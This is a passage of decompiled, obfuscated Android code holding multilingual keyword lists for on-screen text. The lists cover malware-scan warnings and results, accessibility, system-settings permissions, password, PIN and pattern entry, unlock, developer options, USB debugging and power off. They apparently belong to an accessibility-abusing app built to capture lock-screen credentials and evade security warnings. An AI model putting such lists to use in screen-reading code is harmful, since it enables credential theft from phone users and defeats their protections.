        f55764b4 = AbstractC0716jf.m213306g5("病毒", "恶意", "木马", "风险应用", "有害应用", "有害", "病毒", "惡意", "木馬", "風險應用", "有害應用", "有害", "ウイルス", "マルウェア", "トロイの木馬", "有害なアプリ", "바이러스", "악성코드", "멀웨어", "트로이", "유해한 앱", "Vi-rút", "Phần mềm độc hại", "Ứng dụng có hại", "ไวรัส", "มัลแวร์", "แอปที่เป็นอันตราย", "Virus", "Malware", "Aplikasi berbahaya", "Apl berbahaya", "वायरस", "मैलवेयर", "हानिकारक ऐप", "ভাইরাস", "ম্যালওয়্যার", "ক্ষতিকর অ্যাপ", "وائرس", "نقصان دہ ایپ", "فيروس", "برنامج ضار", "برامج ضارة", "تطبيق ضار", "וירוס", "תוכנה זדונית", "אפליקציה מזיקה", "ویروس", "بدافزار", "برنامه مضر", "Virüs", "Kötü amaçlı yazılım", "Zararlı uygulama", "Virus", "Malware", "Trojan", "Harmful app", "Harmful", "Logiciel malveillant", "Application nuisible", "Software malicioso", "Programa malicioso", "App dañina", "Vírus", "Software malicioso", "App prejudicial", "Malware", "Dannoso", "App dannosa", "Schadsoftware", "Schädliche App", "Schadelijke software", "Schadelijke app", "Skadlig programvara", "Skadlig app", "Skadelig programvare", "Skadelig app", "Skadelig software", "Skadelig app", "Haittaohjelma", "Haitallinen sovellus", "Вирус", "Вредоносное", "Вредоносное приложение", "Wirus", "Złośliwe oprogramowanie", "Szkodliwa aplikacja", "Škodlivý software", "Škodlivá aplikace", "Škodlivý softvér", "Škodlivá aplikácia", "Vírus", "Kártékony", "Káros alkalmazás", "Вирус", "Злонамерен", "Вредно приложение", "Вірус", "Шкідливе", "Шкідливий додаток", "Ιός", "Κακόβουλο", "Επιβλαβής εφαρμογή", "Zlonamjerni", "Štetna aplikacija");
        f55765b5 = AbstractC0716jf.m213306g5("未检测到", "未发现", "无风险", "0个风险", "安全", "无病毒", "扫描完成", "未发现有害应用", "未偵測到", "未發現", "無風險", "安全", "無病毒", "掃描完成", "未發現有害應用", "検出されませんでした", "安全", "ウイルスなし", "有害なアプリは見つかりませんでした", "감지되지 않음", "안전", "바이러스 없음", "유해한 앱이 발견되지 않음", "Không phát hiện", "An toàn", "ไม่พบ", "ปลอดภัย", "Tidak ditemukan", "Aman", "Tidak dijumpai", "Selamat", "कोई खतरा नहीं", "सुरक्षित", "لم يتم العثور على", "آمن", "لا مخاطر", "لم يتم العثور على تطبيقات ضارة", "לא נמצא", "בטוח", "Güvenli", "Risk bulunamadı", "Virüs bulunamadı", "Zararlı uygulama bulunamadı", "No virus", "No risk", "Safe", "Secure", "No threats", "Scan complete", "No harmful apps found", "No issues found", "No problems found", "Aucun virus", "Sûr", "Sécurisé", "Analyse terminée", "Sin virus", "Seguro", "Sin riesgo", "Análisis completado", "Sem vírus", "Seguro", "Sem risco", "Verificação concluída", "Nessun virus", "Sicuro", "Nessun rischio", "Kein Virus", "Sicher", "Kein Risiko", "Scan abgeschlossen", "Geen virus", "Veilig", "Geen risico", "Inget virus", "Säker", "Ingen virus", "Trygg", "Ingen virus", "Sikker", "Ei viruksia", "Turvallinen", "Вирусов нет", "Безопасно", "Нет угроз", "Проверка завершена", "Вредоносных приложений не обнаружено", "Brak wirusów", "Bezpieczny", "Žádný virus", "Bezpečné", "Žiadny vírus", "Bezpečné", "Nincs vírus", "Biztonságos", "Fără viruși", "Sigur", "Няма вируси", "Безопасно", "Вірусів немає", "Безпечно");
        f55766b6 = AbstractC0716jf.m213306g5("无限制", "不受限制", "没有限制", "無限制", "不受限制", "No restrictions", "Unrestricted", "No restriction", "制限なし", "無制限", "제한 없음", "무제한", "Không hạn chế", "Không giới hạn", "ไม่จำกัด", "ไม่มีข้อจำกัด", "Tidak dibatasi", "Tanpa batasan", "Tidak ada pembatasan", "Tiada sekatan", "Tidak terhad", "Walang mga paghihigpit", "Hindi pinaghihigpitan", "कोई प्रतिबंध नहीं", "अप्रतिबंधित", "কোনো সীমাবদ্ধতা নেই", "کوئی پابندیاں نہیں", "لا توجد قيود", "بلا قيود", "غير مقيد", "ללא הגבלות", "ללא מגבלות", "بدون محدودیت", "نامحدود", "Kısıtlama yok", "Sınırsız", "Aucune restriction", "Non restreint", "Sans restriction", "Sin restricciones", "Sin límites", "No restringido", "Nenhuma restrição", "Sem restrições", "Irrestrito", "Nessuna restrizione", "Senza restrizioni", "Uneingeschränkt", "Keine Einschränkungen", "Nicht eingeschränkt", "Onbeperkt", "Geen beperkingen", "Obegränsad", "Inga begränsningar", "Ubegrenset", "Ingen begrensninger", "Ubegrænset", "Ingen begrænsninger", "Rajoittamaton", "Ei rajoituksia", "Без ограничений", "Нет ограничений", "Неограниченно", "Bez ograniczeń", "Nieograniczone", "Brak ograniczeń", "Neomezené", "Bez omezení", "Neomezeno", "Bez obmedzení", "Neobmedzené", "Žiadne obmedzenia", "Korlátozás nélkül", "Nem korlátozott", "Korlátlan", "Nincs korlátozás", "Fără restricții", "Nerestricționat", "Неограничено", "Без ограничения", "Необмежено", "Без обмежень", "Χωρίς περιορισμούς", "Απεριόριστη", "Neograničeno", "Bez ograničenja", "Neomejeno", "Brez omejitev", "Be apribojimų", "Neribota", "Jokių apribojimų", "Neierobežots", "Nav ierobežojumu", "Piiramata", "Piiranguteta");
        f55767b7 = AbstractC0716jf.m213306g5("允许通知", "显示通知", "允許通知", "顯示通知", "Allow notifications", "Show notifications", "通知を許可", "通知を表示", "알림 허용", "알림 표시", "Cho phép thông báo", "Hiển thị thông báo", "อนุญาตการแจ้งเตือน", "แสดงการแจ้งเตือน", "Izinkan notifikasi", "Tampilkan notifikasi", "Benarkan pemberitahuan", "Payagan ang mga notification", "सूचनाओं की अनुमति दें", "নোটিফিকেশন অনুমতি দিন", "اطلاعات کی اجازت دیں", "السماح بالإشعارات", "إظهار الإشعارات", "אפשר התראות", "اجازه اعلان\u200cها", "Bildirimlere izin ver", "Bildirimleri göster", "Autoriser les notifications", "Afficher les notifications", "Permitir notificaciones", "Mostrar notificaciones", "Permitir notificações", "Mostrar notificações", "Consenti notifiche", "Mostra notifiche", "Benachrichtigungen zulassen", "Benachrichtigungen anzeigen", "Meldingen toestaan", "Meldingen weergeven", "Tillåt aviseringar", "Visa aviseringar", "Tillat varsler", "Vis varsler", "Tillad notifikationer", "Vis notifikationer", "Salli ilmoitukset", "Näytä ilmoitukset", "Разрешить уведомления", "Показывать уведомления", "Zezwól na powiadomienia", "Pokaż powiadomienia", "Povolit oznámení", "Zobrazit oznámení", "Povoliť upozornenia", "Zobraziť upozornenia", "Értesítések engedélyezése", "Értesítések megjelenítése", "Permite notificările", "Afișează notificările", "Разрешаване на известия", "Показване на известия", "Дозволити сповіщення", "Показувати сповіщення", "Να επιτρέπονται οι ειδοποιήσεις", "Dopusti obavijesti", "Dovoli obvestila", "Leisti pranešimus", "Atļaut paziņojumus", "Luba märguandeid");
        AbstractC0716jf.m213306g5("应用程序信息", "应用信息", "應用程式資訊", "應用資訊", "App info", "Application info", "アプリ情報", "앱 정보", "Thông tin ứng dụng", "ข้อมูลแอป", "Info aplikasi", "Maklumat apl", "Info ng app", "ऐप की जानकारी", "অ্যাপের তথ্য", "ایپ کی معلومات", "معلومات التطبيق", "פרטי אפליקציה", "اطلاعات برنامه", "Uygulama bilgisi", "Infos sur l'appli", "Info de l'application", "Info de la aplicación", "Información de la aplicación", "Informações do app", "Info do app", "Info app", "Informazioni app", "App-Info", "App-Informationen", "App-info", "Sovellusinfo", "Sovelluksen tiedot", "О приложении", "Сведения о приложении", "Informacje o aplikacji", "Informace o aplikaci", "Informácie o aplikácii", "Alkalmazásinformáció", "Alkalmazásadatok", "Informații aplicație", "Info aplicație", "Информация за приложението", "Про додаток", "Відомості про додаток", "Πληροφορίες εφαρμογής", "Informacije o aplikaciji", "Podatki o aplikaciji", "Programos informacija", "Lietotnes informācija", "Rakenduse teave");
        AbstractC0716jf.m213306g5("搜索", "搜尋", "Search", "検索", "검색", "Tìm kiếm", "ค้นหา", "Cari", "Carian", "Maghanap", "खोजें", "অনুসন্ধান", "تلاش", "بحث", "חיפוש", "جستجو", "Ara", "Rechercher", "Buscar", "Pesquisar", "Cerca", "Suchen", "Zoeken", "Sök", "Søk", "Søg", "Hae", "Поиск", "Szukaj", "Hledat", "Hľadať", "Keresés", "Căutare", "Търсене", "Пошук", "Αναζήτηση", "Pretraži", "Iskanje", "Ieškoti", "Meklēt", "Otsi");
        f55768b8 = AbstractC0716jf.m213306g5("正在运行的服务", "正在運行的服務", "Running services", "実行中のサービス", "실행 중인 서비스", "Dịch vụ đang chạy", "บริการที่กำลังทำงาน", "Layanan yang berjalan", "Perkhidmatan yang berjalan", "Mga tumatakbong serbisyo", "चल रही सेवाएं", "চলমান পরিষেবা", "چل رہی سروسز", "الخدمات قيد التشغيل", "שירותים פעילים", "سرویس\u200cهای در حال اجرا", "Çalışan hizmetler", "Services en cours d'exécution", "Servicios en ejecución", "Serviços em execução", "Servizi in esecuzione", "Laufende Dienste", "Actieve services", "Tjänster som körs", "Kjørende tjenester", "Kørende tjenester", "Käynnissä olevat palvelut", "Запущенные сервисы", "Работающие службы", "Uruchomione usługi", "Spuštěné služby", "Spustené služby", "Futó szolgáltatások", "Servicii în execuție", "Работещи услуги", "Запущені сервіси", "Εκτελούμενες υπηρεσίες", "Pokrenuti servisi", "Izvajane storitve", "Veikiančios paslaugos", "Darbojošies pakalpojumi", "Töötavad teenused");
        f55769b9 = AbstractC0716jf.m213306g5("无障碍", "无障碍服务", "无障碍功能", "無障礙", "無障礙服務", "無障礙功能", "ユーザー補助", "ユーザー補助サービス", "접근성", "접근성 서비스", "Hỗ trợ tiếp cận", "Trợ năng", "การเข้าถึง", "บริการการเข้าถึง", "Aksesibilitas", "Layanan aksesibilitas", "Kebolehcapaian", "Accessibility", "Pag-access", "सुलभता", "एक्सेसिबिलिटी", "অ্যাক্সেসিবিলিটি", "رسائی", "إمكانية الوصول", "خدمات إمكانية الوصول", "נגישות", "שירותי נגישות", "دسترس\u200cپذیری", "Erişilebilirlik", "Erişilebilirlik hizmetleri", "Accessibility", "Accessibility service", "Accessibility services", "Accessibility settings", "Accessibilité", "Services d'accessibilité", "Accesibilidad", "Servicios de accesibilidad", "Acessibilidade", "Serviços de acessibilidade", "Accessibilità", "Servizi di accessibilità", "Bedienungshilfen", "Bedienungshilfe", "Toegankelijkheid", "Toegankelijkheidsservices", "Tillgänglighet", "Hjälpmedelstjänster", "Tilgjengelighet", "Tilgjengelighetstjenester", "Tilgængelighed", "Tilgængelighedstjenester", "Esteettömyys", "Esteettömyyspalvelut", "Специальные возможности", "Службы специальных возможностей", "Ułatwienia dostępu", "Usługi ułatwień dostępu", "Usnadnění", "Služby usnadnění", "Uľahčenie prístupu", "Kisegítő lehetőségek", "Akadálymentesítés", "Accesibilitate", "Servicii de accesibilitate", "Достъпност", "Услуги за достъпност", "Спеціальні можливості", "Προσβασιμότητα", "Υπηρεσίες προσβασιμότητας", "Pristupačnost", "Dostopnost", "Prieinamumas", "Pieejamība", "Hõlbustus", "Juurdepääsetavus");
        f55770c0 = AbstractC0716jf.m213306g5("版本信息", "版本号", "版本資訊", "版本號", "Version info", "Version information", "Build number", "Software information", "バージョン情報", "ビルド番号", "버전 정보", "빌드 번호", "Thông tin phiên bản", "ข้อมูลเวอร์ชัน", "Info versi", "Maklumat versi", "Impormasyon ng bersyon", "संस्करण जानकारी", "সংস্করণ তথ্য", "ورژن کی معلومات", "معلومات الإصدار", "פרטי גרסה", "اطلاعات نسخه", "Sürüm bilgisi", "Informations sur la version", "Información de versión", "Informações da versão", "Informazioni versione", "Versionsinformationen", "Versie-informatie", "Versionsinformation", "Versjonsinformasjon", "Versionsoplysninger", "Versiotiedot", "Сведения о версии", "Информация о версии", "Відомості про версію", "Informacje o wersji", "Informace o verzi", "Informácie o verzii", "Verzióinformáció", "Informații versiune", "Πληροφορίες έκδοσης", "Информация за версията", "Maelezo ya toleo", "ဗားရှင်းအချက်အလက်", "ព័ត៌មាន\u200bកំណែ", "ຂໍ້ມູນເວີຊັນ", "संस्करण जानकारी", "අනුවාද තොරතුරු", "ስሪት መረጃ", "Informacije o verziji", "Podatki o različici", "Versijos informacija", "Versijas informācija", "Versiooniteave");
        f55771c1 = AbstractC0716jf.m213306g5("允许修改系统设置", "修改系统设置", "允许修改系统", "系统设置修改", "修改系统设定", "可以修改系统设定", "可修改系统设定", "允许修改系统设定", "系统设定", "更改系统设置", "更改系统设定", "允许更改系统", "可以更改系统", "允許修改系統設定", "修改系統設定", "Allow modifying system settings", "Modify system settings", "Can modify system settings", "Write settings", "Allow modify system settings", "システム設定の変更を許可", "システム設定の変更", "システム設定を変更", "시스템 설정 변경 허용", "시스템 설정 수정", "Cho phép sửa đổi cài đặt hệ thống", "Sửa đổi cài đặt hệ thống", "อนุญาตให้แก้ไขการตั้งค่าระบบ", "แก้ไขการตั้งค่าระบบ", "Izinkan mengubah setelan sistem", "Ubah setelan sistem", "Mengubah setelan sistem", "Izinkan ubah pengaturan sistem", "Ubah pengaturan sistem", "Mengubah pengaturan sistem", "Benarkan mengubah suai tetapan sistem", "Ubah suai tetapan sistem", "Payagan ang pagbabago ng mga setting ng system", "सिस्टम सेटिंग बदलने की अनुमति दें", "सिस्टम सेटिंग बदलें", "সিস্টেম সেটিংস পরিবর্তন করার অনুমতি দিন", "سسٹم سیٹنگز میں ترمیم کی اجازت دیں", "السماح بتعديل إعدادات النظام", "تعديل إعدادات النظام", "אפשר שינוי הגדרות מערכת", "اجازه تغییر تنظیمات سیستم", "Sistem ayarlarını değiştirmeye izin ver", "Sistem ayarlarını değiştir", "Разрешить изменение настроек системы", "Изменение системных настроек", "Дозволити змінювати налаштування системи", "Systemeinstellungen ändern", "Ändern von Systemeinstellungen zulassen", "Autoriser la modification des paramètres système", "Modifier les paramètres système", "Permitir modificar la configuración del sistema", "Modificar configuración del sistema", "Permitir modificar configurações do sistema", "Modificar configurações do sistema", "Consenti modifica impostazioni di sistema", "Modifica impostazioni di sistema", "Systeeminstellingen wijzigen toestaan", "Zezwól na zmianę ustawień systemowych", "Povolit změnu nastavení systému", "Permiteți modificarea setărilor de sistem", "Rendszerbeállítások módosításának engedélyezése", "Να επιτρέπεται η τροποποίηση ρυθμίσεων συστήματος", "Tillåt ändring av systeminställningar", "Tillat endring av systeminnstillinger", "Tillad ændring af systemindstillinger", "Salli järjestelmäasetusten muuttaminen", "Povoliť zmenu nastavení systému", "Dopusti izmjenu postavki sustava", "Разрешаване на промяна на системните настройки", "Atļaut mainīt sistēmas iestatījumus", "Luba süsteemiseadete muutmine");
        List listM213306g5 = AbstractC0716jf.m213306g5("密码", "口令", "密碼", "password", "passcode", "Password", "Passcode", "パスワード", "비밀번호", "mật khẩu", "รหัสผ่าน", "kata sandi", "kata laluan", "पासवर्ड", "পাসওয়ার্ড", "پاس ورڈ", "كلمة المرور", "סיסמה", "رمز عبور", "şifre", "parola", "пароль", "пароль", "Passwort", "mot de passe", "contraseña", "senha", "wachtwoord", "hasło", "heslo", "parolă", "jelszó", "κωδικός", "lösenord", "passord", "adgangskode", "salasana", "heslo", "lozinka", "парола", "parole", "parool");
        f55772c2 = listM213306g5;
        List listM213306g52 = AbstractC0716jf.m213306g5("PIN", "pin", "Pin", "输入PIN", "输入 PIN", "PIN码", "PIN碼", "Enter PIN", "Enter pin", "Type PIN", "PINを入力", "PIN 입력", "Nhập PIN", "ป้อน PIN", "Masukkan PIN", "Masukkan PIN", "PIN दर्ज करें", "PIN লিখুন", "PIN درج کریں", "أدخل رقم PIN", "הזן PIN", "PIN را وارد کنید", "PIN girin", "Введите PIN", "Введіть PIN", "PIN eingeben", "Saisir le code PIN", "Introducir PIN", "Inserir PIN", "Voer PIN in", "Wpisz PIN", "Zadejte PIN", "Introduceți PIN", "Adja meg a PIN", "Εισαγωγή PIN", "Ange PIN", "Skriv inn PIN", "Indtast PIN", "Syötä PIN", "Zadajte PIN", "Unesite PIN", "Въведете PIN", "Ievadiet PIN", "Sisestage PIN");
        f55773c3 = listM213306g52;
        f55774c4 = AbstractC0716jf.m213306g5("解锁", "登录", "確認解鎖", "解鎖", "Unlock", "unlock", "Login", "login", "Sign in", "ロック解除", "ログイン", "잠금 해제", "로그인", "Mở khóa", "Đăng nhập", "ปลดล็อก", "เข้าสู่ระบบ", "Buka kunci", "Masuk", "Buka kunci", "Log masuk", "अनलॉक", "लॉगिन", "আনলক", "লগইন", "ان لاک", "لاگ ان", "فتح القفل", "تسجيل الدخول", "בטל נעילה", "התחבר", "باز کردن قفل", "ورود", "Kilidi aç", "Giriş yap", "Разблокировать", "Войти", "Розблокувати", "Увійти", "Entsperren", "Anmelden", "Déverrouiller", "Se connecter", "Desbloquear", "Iniciar sesión", "Desbloquear", "Entrar", "Ontgrendelen", "Inloggen", "Odblokuj", "Zaloguj", "Odemknout", "Přihlásit", "Deblocați", "Conectare", "Feloldás", "Bejelentkezés", "Ξεκλείδωμα", "Σύνδεση", "Lås upp", "Logga in", "Lås opp", "Logg inn", "Lås op", "Log ind", "Avaa lukitus", "Kirjaudu", "Odomknúť", "Prihlásiť", "Otključaj", "Prijava", "Отключване", "Вход", "Atbloķēt", "Ieiet", "Ava lukustus", "Logi sisse");
        List listM213306g53 = AbstractC0716jf.m213306g5("图案", "绘制图案", "绘制解锁图案", "画出图案", "圖案", "pattern", "Pattern", "Draw pattern", "draw pattern", "Enter pattern", "Confirm pattern", "パターン", "패턴", "Mẫu hình", "Vẽ mẫu hình", "รูปแบบ", "วาดรูปแบบ", "Pola", "Gambar pola", "Corak", "Lukis corak", "पैटर्न", "প্যাটার্ন", "پیٹرن", "النمط", "תבנית", "الگو", "Desen", "Шаблон", "Шаблон", "Muster", "Schéma", "Patrón", "Padrão", "Patroon", "Wzór", "Gesto", "Model", "Minta", "Μοτίβο", "Mönster", "Mønster", "Mønster", "Kuvio", "Vzor", "Uzorak", "Шаблон", "Raksts", "Muster");
        f55775c5 = listM213306g53;
        f55776c6 = AbstractC0716jf.m213306g5("紧急呼叫", "紧急", "緊急呼叫", "緊急", "Emergency", "emergency", "Emergency call", "緊急通報", "긴급 전화", "긴급", "Cuộc gọi khẩn cấp", "Khẩn cấp", "โทรฉุกเฉิน", "ฉุกเฉิน", "Panggilan darurat", "Darurat", "Panggilan kecemasan", "आपातकालीन", "জরুরি", "ایمرجنسی", "طوارئ", "חירום", "اضطراری", "Acil arama", "Acil", "Экстренный вызов", "Екстрений виклик", "Notruf", "Appel d'urgence", "Urgence", "Llamada de emergencia", "Emergencia", "Chamada de emergência", "Emergência", "Noodoproep", "Połączenie alarmowe", "Tísňové volání", "Apel de urgență", "Segélyhívás", "Κλήση έκτακτης ανάγκης", "Nödsamtal", "Nødanrop", "Nødopkald", "Hätäpuhelu", "Tiesňové volanie", "Hitni poziv", "Спешно обаждане", "Ārkārtas zvans", "Hädaabikõne");
        f55777c7 = AbstractC0716jf.m213306g5("删除", "退格", "刪除", "delete", "Delete", "backspace", "Backspace", "削除", "삭제", "Xóa", "ลบ", "Hapus", "Padam", "हटाएं", "মুছুন", "حذف کریں", "حذف", "מחק", "حذف", "Sil", "Удалить", "Видалити", "Löschen", "Supprimer", "Eliminar", "Excluir", "Verwijderen", "Usuń", "Smazat", "Șterge", "Törlés", "Διαγραφή", "Ta bort", "Slett", "Slet", "Poista", "Odstrániť", "Izbriši", "Изтриване", "Dzēst", "Kustuta");
        f55778c8 = AbstractC0716jf.m213306g5("确认", "确定", "確定", "確認", "好", "完成", "OK", "Ok", "Confirm", "confirm", "Done", "done", "完了", "完了する", "확인", "완료", "Xác nhận", "Hoàn tất", "ยืนยัน", "เสร็จสิ้น", "Konfirmasi", "Selesai", "Sahkan", "पुष्टि करें", "নিশ্চিত করুন", "تصدیق کریں", "تأكيد", "אישור", "تأیید", "Onayla", "Tamam", "Подтвердить", "Готово", "Підтвердити", "Bestätigen", "Fertig", "Confirmer", "Terminé", "Confirmar", "Hecho", "Concluir", "Bevestigen", "Gereed", "Potwierdź", "Gotowe", "Potvrdit", "Hotovo", "Confirmă", "Gata", "Megerősítés", "Kész", "Επιβεβαίωση", "Τέλος", "Bekräfta", "Klar", "Bekreft", "Ferdig", "Bekræft", "Færdig", "Vahvista", "Valmis", "Potvrdiť", "Potvrdi", "Потвърди", "Apstiprināt", "Gatavs", "Kinnita");
        List listM213306g54 = AbstractC0716jf.m213306g5("输入密码", "请输入密码", "輸入密碼", "Enter password", "Type password", "Enter your password", "パスワードを入力", "비밀번호 입력", "Nhập mật khẩu", "ป้อนรหัสผ่าน", "Masukkan kata sandi", "Masukkan kata laluan", "पासवर्ड दर्ज करें", "পাসওয়ার্ড লিখুন", "پاس ورڈ درج کریں", "أدخل كلمة المرور", "הזן סיסמה", "رمز عبور را وارد کنید", "Şifre girin", "Введите пароль", "Введіть пароль", "Passwort eingeben", "Saisir le mot de passe", "Introducir contraseña", "Inserir senha", "Voer wachtwoord in", "Wpisz hasło", "Zadejte heslo", "Introduceți parola", "Adja meg a jelszót", "Εισαγωγή κωδικού", "Ange lösenord", "Skriv inn passord", "Indtast adgangskode", "Syötä salasana", "Zadajte heslo", "Unesite lozinku", "Въведете парола", "Ievadiet paroli", "Sisestage parool");
        f55779c9 = listM213306g54;
        f55780d0 = AbstractC0716jf.m213306g5("空格", "符号", "数字", "字母", "shift", "Shift", "abc", "ABC", "123", "?123", "!#1", "space", "Space", "スペース", "공백", "Spasi", "ช่องว่าง", "Khoảng cách", "Espace", "Espacio", "Espaço", "Leertaste", "Spatie", "Spacja", "Mezerník");
        f55781d1 = AbstractC0716jf.m213306g5("关于手机", "关于本机", "关于设备", "關於手機", "關於裝置", "About phone", "About device", "About tablet", "端末情報", "デバイス情報", "휴대전화 정보", "디바이스 정보", "Giới thiệu về điện thoại", "Thông tin điện thoại", "เกี่ยวกับโทรศัพท์", "Tentang ponsel", "Tentang Telepon", "Tentang telefon", "Perihal telefon", "Tungkol sa telepono", "फ़ोन के बारे में", "ফোন সম্পর্কে", "فون کے بارے میں", "حول الهاتف", "אודות הטלפון", "درباره تلفن", "Telefon hakkında", "À propos du téléphone", "Información del teléfono", "Acerca del teléfono", "Sobre o telefone", "Informazioni sul telefono", "Info telefono", "Über das Telefon", "Telefoninfo", "Over de telefoon", "Om telefonen", "Om telefon", "Om telefonen", "Info om telefonen", "Puhelimen tiedot", "О телефоне", "Про телефон", "Informacje o telefonie", "O telefonie", "O telefonu", "O telefóne", "A telefonról", "Despre telefon", "Σχετικά με το τηλέφωνο", "За телефона", "Kuhusu simu", "फोनको बारेमा", "ກ່ຽວກັບໂທລະສັບ", "អំពី\u200bទូរសព្ទ", "ဖုန်းအကြောင်း", "ስለ ስልኩ", "දුරකථනය ගැන");
        f55782d2 = AbstractC0716jf.m213306g5("USB调试", "USB 调试", "USB偵錯", "保持唤醒", "保持螢幕開啟", "无线调试", "無線偵錯", "OEM解锁", "OEM解鎖", "系统跟踪", "USB debugging", "Stay awake", "Wireless debugging", "OEM unlocking", "System tracing", "USBデバッグ", "画面のスリープを解除", "USB 디버깅", "화면 켜진 상태 유지", "Gỡ lỗi USB", "Gỡ lỗi qua Wi-Fi", "การดีบัก USB", "การแก้ไขข้อบกพร่อง USB", "Debug USB", "Proses debug USB", "Mendebug USB", "Debugging USB", "Tetap terjaga", "Penyahpepijatan USB", "Nyahpepijat USB", "Pag-debug ng USB", "USB डिबगिंग", "USB डीबगिंग", "USB ডিবাগিং", "USB ڈیبگنگ", "تصحيح أخطاء USB", "تصحيح USB", "ניפוי באגים ב-USB", "اشکال\u200cزدایی USB", "USB hata ayıklama", "Débogage USB", "Depuración USB", "Depuración de USB", "Depuração USB", "Depuração de USB", "Debug USB", "USB-Debugging", "OEM-Entsperrung", "USB-foutopsporing", "USB-felsökning", "USB-feilsøking", "USB-fejlretning", "USB-fejlfinding", "USB-virheenkorjaus", "Отладка по USB", "Відлагодження USB", "Debugowanie USB", "Ladění USB", "Ladenie USB", "USB-hibakeresés", "Depanare USB", "Εντοπισμός σφαλμάτων USB", "USB отстраняване на грешки");
        f55783d3 = AbstractC0716jf.m213306g5("开发者选项", "开发人员选项", "開發人員選項", "Developer options", "Developer option", "開発者向けオプション", "개발자 옵션", "Tuỳ chọn cho nhà phát triển", "Tùy chọn cho nhà phát triển", "Tùy chọn nhà phát triển", "ตัวเลือกสำหรับนักพัฒนาแอป", "ตัวเลือกสำหรับนักพัฒนา", "Opsi developer", "Opsi pengembang", "Pilihan pengembang", "Setelan pengembang", "Pilihan pembangun", "Mga opsyon ng developer", "डेवलपर के लिए सेटिंग और टूल", "डेवलपर विकल्प", "ডেভেলপার বিকল্প", "ڈویلپر کے اختیارات", "خيارات المطورين", "خيارات المطور", "אפשרויות למפתחים", "گزینه\u200cهای توسعه\u200cدهندگان", "گزینه\u200cهای توسعه\u200cدهنده", "Geliştirici seçenekleri", "Options pour les développeurs", "Opciones para desarrolladores", "Opções do desenvolvedor", "Opzioni sviluppatore", "Entwickleroptionen", "Ontwikkelaarsopties", "Utvecklaralternativ", "Utvikleralternativer", "Indstillinger for udviklere", "Udviklerindstillinger", "Kehittäjäasetukset", "Для разработчиков", "Параметры разработчика", "Параметри розробника", "Opcje programisty", "Opcje programistyczne", "Pro vývojáře", "Možnosti vývojáře", "Možnosti pro vývojáře", "Pre vývojárov", "Možnosti pre vývojárov", "Fejlesztői beállítások", "Opțiuni pentru dezvoltatori", "Επιλογές για προγραμματιστές", "Опции за програмисти", "Opciones de desarrollador", "Udviklermuligheder", "Opcije za razvojne programere", "Možnosti za razvijalce", "Kūrėjo parinktys", "Izstrādātāju opcijas", "Arendaja valikud", "Chaguo za wasanidi", "ဆော့ဝဲလ်ရေးသူ ရွေးစရာများ", "ជម្រើសសម្រាប់អ្នកអភិវឌ្ឍន៍", "ຕົວເລືອກນັກພັດທະນາ", "विकासकर्ताका विकल्पहरू", "වර්ධක විකල්ප", "የገንቢዎች አማራጮች");
        AbstractC0716jf.m213306g5("已处于开发者模式", "您已处于开发者模式", "开发者模式已开启", "已开启开发者选项", "已进入开发者模式", "无需进行此操作", "開發人員選項已啟用", "您已成為開發人員", "Developer mode enabled", "already a developer", "You are already a developer", "Developer mode has been enabled", "You are now a developer", "開発者向けオプションが有効になりました", "開発者向けオプションはすでに有効です", "デベロッパーモードが有効", "개발자가 되셨습니다", "이미 개발자입니다", "개발자 모드 사용", "Bạn đã là nhà phát triển", "Chế độ nhà phát triển đã bật", "ตอนนี้คุณเป็นนักพัฒนาซอฟต์แวร์แล้ว", "คุณเป็นนักพัฒนาซอฟต์แวร์อยู่แล้ว", "เปิดโหมดนักพัฒนาแล้ว", "Anda sekarang berada di mode developer", "Anda sudah berada di mode developer", "Mode pengembang diaktifkan", "Anda telah menjadi pembangun", "anda sudah pun menjadi pembangun", "Isa ka nang developer", "डेवलपर के लिए सेटिंग और टूल का विकल्प अब चालू हो गया है", "डेवलपर के लिए सेटिंग और टूल पहले से ही चालू है", "আপনি এখন একজন ডেভেলপার", "আপনি ইতিমধ্যেই একজন ডেভেলপার", "اب آپ ایک ڈویلپر ہیں", "آپ پہلے سے ہی ایک ڈویلپر ہیں", "لقد أصبحت الآن مطور برامج", "הוגדרת כמפתח", "כבר הוגדרת כמפתח", "شما اکنون یک برنامه\u200cنویس هستید", "شما در حال حاضر یک برنامه\u200cنویس هستید", "Artık bir geliştiricisiniz", "siz zaten bir geliştiricisiniz", "Mode développeur activé", "vous êtes déjà développeur", "¡Ya eres desarrollador!", "opciones para desarrolladores ya están activadas", "Modo de desarrollo habilitado", "Você agora é um desenvolvedor", "Você já é um desenvolvedor", "Modo de desenvolvedor ativado", "Ora sei uno sviluppatore", "sei già uno sviluppatore", "Modalità sviluppatore attivata", "Du bist jetzt Entwickler", "du bist bereits Entwickler", "Entwicklermodus aktiviert", "Je bent nu ontwikkelaar", "je bent al ontwikkelaar", "Nu är du en utvecklare", "Du är redan utvecklare", "Du er nå utvikler", "du er allerede utvikler", "Nu er du udvikler", "Du er allerede udvikler", "Olet nyt kehittäjä", "olet jo kehittäjä", "Вы стали разработчиком", "вы уже разработчик", "Режим разработчика включен", "Тепер ви – розробник", "ви вже розробник", "Режим розробника увімкнено", "Teraz jesteś programistą", "już jesteś programistą", "Stal se z vás vývojář", "už jste vývojář", "Teraz ste vývojár", "už ste vývojár", "Ön mostantól már fejlesztő", "Ön már fejlesztő", "Ai devenit dezvoltator", "ești deja dezvoltator", "Είστε πλέον προγραμματιστής", "είστε ήδη προγραμματιστής", "Вече сте програмист", "Sasa wewe ni msanidi programu", "tayari wewe ni msanidi programu", "ဆော့ဖ်ဝဲရေးသူ ဖြစ်နေပါပြီ", "ဆော့ဖ်ဝဲရေးသူ ဖြစ်ပြီးသားပါ", "អ្នក\u200bក្លាយ\u200bជា\u200bអ្នក\u200bអភិវឌ្ឍ\u200bន៍ហើយ", "អ្នក\u200bជា\u200bអ្នក\u200bអភិវឌ្ឍ\u200bរួច\u200bហើយ", "ທ່ານເປັນນັກພັດທະນາແລ້ວ", "ທ່ານເປັນນັກພັດທະນາຢູ່ແລ້ວ", "तपाईं अब विकासकर्ता हुनुभएको छ", "तपाईं आफैँ नै एउटा विकासकर्ता हुनुहुन्छ", "ඔබ දැන් සංවර්ධකයෙකි", "አሁን ገንቢ ነዎት");
        AbstractC0716jf.m213306g5("关机", "關機", "Power off", "Shut down", "Shutdown", "電源オフ", "전원 끄기", "Tắt nguồn", "ปิดเครื่อง", "Matikan", "Éteindre", "Apagar", "Ausschalten", "Spegnimento", "Выключить", "Вимкнути", "Wyłącz", "Vypnout");
